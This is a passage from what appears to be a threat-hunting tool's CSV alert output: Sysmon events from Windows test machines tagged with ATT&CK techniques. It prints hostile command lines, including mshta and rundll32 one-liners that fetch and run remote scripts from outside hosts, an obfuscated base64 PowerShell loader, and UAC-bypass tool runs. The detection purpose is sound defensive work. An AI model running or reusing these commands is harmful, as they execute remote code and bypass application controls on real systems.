QBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1557669406.573766,2019-05-12T17:56:46.573766+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( &quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T13:56:12.652868Z"">
</TimeCreated>
<EventRecordID>16438</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2036"" ThreadID=""296"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 13:56:12.485</Data>
<Data Name=""ProcessGuid"">365ABB72-25FC-5CD8-0000-0010906A1300</Data>
<Data Name=""ProcessId"">2168</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot; shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-2523-5CD8-0000-00204C360100</Data>
<Data Name=""LogonId"">0x1364c</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-25EC-5CD8-0000-0010CB0A1000</Data>
<Data Name=""ParentProcessId"">684</Data>
<Data Name=""ParentImage"">C:\Python27\python.exe</Data>
<Data Name=""ParentCommandLine"">python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1601936900.530243,2020-10-06T02:28:20.530243+04:00,,Threat,Low,Found User (LAPTOP-JU4M3I0E\bouss) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-05T22:28:20.530062Z"">
</TimeCreated>
<EventRecordID>2164913</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""5424"" ThreadID=""6708"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>LAPTOP-JU4M3I0E</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-05 22:28:20.529</Data>
<Data Name=""ProcessGuid"">00247C92-9E04-5F7B-0000-0010CF98272C</Data>
<Data Name=""ProcessId"">12876</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.18362.449 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\windows\system32\</Data>
<Data Name=""User"">LAPTOP-JU4M3I0E\bouss</Data>
<Data Name=""LogonGuid"">00247C92-8C36-5F75-0000-002034E39103</Data>
<Data Name=""LogonId"">0x391e334</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">00247C92-9E03-5F7B-0000-0010A645272C</Data>
<Data Name=""ParentProcessId"">20228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\mmc.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\mmc.exe&quot; WF.msc</Data>
</EventData>
</Event>",LAPTOP-JU4M3I0E,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558969966.981641,2019-05-27T19:12:46.981641+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:45.491710Z"">
</TimeCreated>
<EventRecordID>6177</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 15:12:45.437</Data>
<Data Name=""ProcessGuid"">365ABB72-FE6D-5CEB-0000-0010122D0C00</Data>
<Data Name=""ProcessId"">1636</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE6D-5CEB-0000-0010332A0C00</Data>
<Data Name=""ParentProcessId"">3876</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\wbem\wmic.exe /output:C:\Windows\TEMP\CEafXbEl /INTERACTIVE:off /node:localhost Service where(name=&quot;swprv&quot;) get state</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1218.005 ] Mshta found running in the system,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:18.583990Z"">
</TimeCreated>
<EventRecordID>4904</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:18.451</Data>
<Data Name=""ProcessGuid"">747F3D96-661E-5D3F-0000-00107F248700</Data>
<Data Name=""ProcessId"">3164</Data>
<Data Name=""Image"">C:\Windows\System32\mshta.exe</Data>
<Data Name=""FileVersion"">11.00.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Microsoft (R) HTML Application host</Data>
<Data Name=""Product"">Internet Explorer</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-661E-5D3F-0000-0010A3148700</Data>
<Data Name=""ParentProcessId"">776</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1584766818.050631,2020-03-21T09:00:18.050631+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:18.046159Z"">
</TimeCreated>
<EventRecordID>243527</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:17.682</Data>
<Data Name=""ProcessGuid"">747F3D96-9F61-5E75-0000-001059841E00</Data>
<Data Name=""ProcessId"">8076</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1603490301.696651,2020-10-24T01:58:21.696651+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:21.695842Z"">
</TimeCreated>
<EventRecordID>424175</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:21.693</Data>
<Data Name=""ProcessGuid"">747F3D96-51FD-5F93-0000-00103B425E00</Data>
<Data Name=""ProcessId"">7504</Data>
<Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-4690-5F93-0000-002019A60800</Data>
<Data Name=""LogonId"">0x8a619</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
<Data Name=""ParentProcessGuid"">747F3D96-51F9-5F93-0000-0010551E5E00</Data>
<Data Name=""ParentProcessId"">9116</Data>
<Data Name=""ParentImage"">C:\Windows\SysWOW64\rundll32.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\SysWOW64\rundll32.exe&quot; &quot;C:\Windows\SysWOW64\shell32.dll&quot;,#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1558452777.867089,2019-05-21T19:32:57.867089+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-21T15:32:57.286254Z"">
</TimeCreated>
<EventRecordID>4126</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3416"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-21 15:32:57.276</Data>
<Data Name=""ProcessGuid"">365ABB72-1A29-5CE4-0000-00107BE42101</Data>
<Data Name=""ProcessId"">2920</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-39CC-5CE3-0000-002096C70000</Data>
<Data Name=""LogonId"">0xc796</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
<Data Name=""ParentProcessGuid"">365ABB72-1A29-5CE4-0000-001054E32101</Data>
<Data Name=""ParentProcessId"">1532</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /C rundll32.exe javascript:&quot;\..\mshtml,RunHTMLApplication &quot;;document.write();h=new%20ActiveXObject(&quot;WScript.Shell&quot;).run(&quot;mshta https://hotelesms.com/talsk.txt&quot;,0,true);</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1170] Detecting Mshta,1564435999.891564,2019-07-30T01:33:19.891564+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run mshta with Command Line (mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine (cmd /c mshta.exe javascript:a=GetObject(&quot;script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct&quot;).Exec();close();) in directory : ( C:\Windows\system32\ )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
